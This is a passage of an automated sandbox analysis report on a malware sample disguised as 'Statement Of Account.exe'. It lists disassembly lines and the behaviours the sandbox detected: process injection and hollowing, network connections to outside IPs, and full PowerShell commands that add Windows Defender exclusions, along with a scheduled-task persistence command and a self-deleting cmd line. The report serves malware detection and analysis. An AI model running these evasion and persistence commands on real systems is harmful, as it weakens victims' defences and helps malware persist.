          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF89B3 mov eax, dword ptr fs:[00000030h]8_2_00FF89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF89B3 mov eax, dword ptr fs:[00000030h]8_2_00FF89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h]8_2_00F829A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F709AD mov eax, dword ptr fs:[00000030h]8_2_00F709AD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F709AD mov eax, dword ptr fs:[00000030h]8_2_00F709AD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01006870 mov eax, dword ptr fs:[00000030h]8_2_01006870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01006870 mov eax, dword ptr fs:[00000030h]8_2_01006870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFC97C mov eax, dword ptr fs:[00000030h]8_2_00FFC97C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB096E mov eax, dword ptr fs:[00000030h]8_2_00FB096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB096E mov edx, dword ptr fs:[00000030h]8_2_00FB096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB096E mov eax, dword ptr fs:[00000030h]8_2_00FB096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h]8_2_00F96962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h]8_2_00F96962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h]8_2_00F96962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF0946 mov eax, dword ptr fs:[00000030h]8_2_00FF0946
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010408C0 mov eax, dword ptr fs:[00000030h]8_2_010408C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF892A mov eax, dword ptr fs:[00000030h]8_2_00FF892A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A8E4 mov eax, dword ptr fs:[00000030h]8_2_0103A8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFC912 mov eax, dword ptr fs:[00000030h]8_2_00FFC912
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68918 mov eax, dword ptr fs:[00000030h]8_2_00F68918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68918 mov eax, dword ptr fs:[00000030h]8_2_00F68918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE908 mov eax, dword ptr fs:[00000030h]8_2_00FEE908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE908 mov eax, dword ptr fs:[00000030h]8_2_00FEE908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044B00 mov eax, dword ptr fs:[00000030h]8_2_01044B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAAAEE mov eax, dword ptr fs:[00000030h]8_2_00FAAAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAAAEE mov eax, dword ptr fs:[00000030h]8_2_00FAAAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F70AD0 mov eax, dword ptr fs:[00000030h]8_2_00F70AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA4AD0 mov eax, dword ptr fs:[00000030h]8_2_00FA4AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA4AD0 mov eax, dword ptr fs:[00000030h]8_2_00FA4AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01038B28 mov eax, dword ptr fs:[00000030h]8_2_01038B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01038B28 mov eax, dword ptr fs:[00000030h]8_2_01038B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h]8_2_00FC6ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h]8_2_00FC6ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h]8_2_00FC6ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01006B40 mov eax, dword ptr fs:[00000030h]8_2_01006B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01006B40 mov eax, dword ptr fs:[00000030h]8_2_01006B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103AB40 mov eax, dword ptr fs:[00000030h]8_2_0103AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01018B42 mov eax, dword ptr fs:[00000030h]8_2_01018B42
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024B4B mov eax, dword ptr fs:[00000030h]8_2_01024B4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024B4B mov eax, dword ptr fs:[00000030h]8_2_01024B4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101EB50 mov eax, dword ptr fs:[00000030h]8_2_0101EB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h]8_2_01042B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h]8_2_01042B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h]8_2_01042B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h]8_2_01042B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78AA0 mov eax, dword ptr fs:[00000030h]8_2_00F78AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78AA0 mov eax, dword ptr fs:[00000030h]8_2_00F78AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC6AA4 mov eax, dword ptr fs:[00000030h]8_2_00FC6AA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA8A90 mov edx, dword ptr fs:[00000030h]8_2_00FA8A90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6EA80 mov eax, dword ptr fs:[00000030h]8_2_00F6EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6EA80 mov eax, dword ptr fs:[00000030h]8_2_00F6EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h]8_2_00F7EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FECA72 mov eax, dword ptr fs:[00000030h]8_2_00FECA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FECA72 mov eax, dword ptr fs:[00000030h]8_2_00FECA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h]8_2_00FACA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h]8_2_00FACA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h]8_2_00FACA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80A5B mov eax, dword ptr fs:[00000030h]8_2_00F80A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80A5B mov eax, dword ptr fs:[00000030h]8_2_00F80A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h]8_2_00F76A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024BB0 mov eax, dword ptr fs:[00000030h]8_2_01024BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024BB0 mov eax, dword ptr fs:[00000030h]8_2_01024BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94A35 mov eax, dword ptr fs:[00000030h]8_2_00F94A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94A35 mov eax, dword ptr fs:[00000030h]8_2_00F94A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101EBD0 mov eax, dword ptr fs:[00000030h]8_2_0101EBD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA2E mov eax, dword ptr fs:[00000030h]8_2_00F9EA2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FACA24 mov eax, dword ptr fs:[00000030h]8_2_00FACA24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFCA11 mov eax, dword ptr fs:[00000030h]8_2_00FFCA11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68A00 mov eax, dword ptr fs:[00000030h]8_2_00F68A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68A00 mov eax, dword ptr fs:[00000030h]8_2_00F68A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EBFC mov eax, dword ptr fs:[00000030h]8_2_00F9EBFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h]8_2_00F78BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h]8_2_00F78BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h]8_2_00F78BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFCBF0 mov eax, dword ptr fs:[00000030h]8_2_00FFCBF0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.12.38.29 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80Jump to behavior
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 2580
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 2580
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 860000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: D0000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6A4008Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CE9008Jump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: explorer.exe, 00000009.00000000.1714538739.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000009.00000000.1704959989.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Users\user\Desktop\Statement Of Account.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
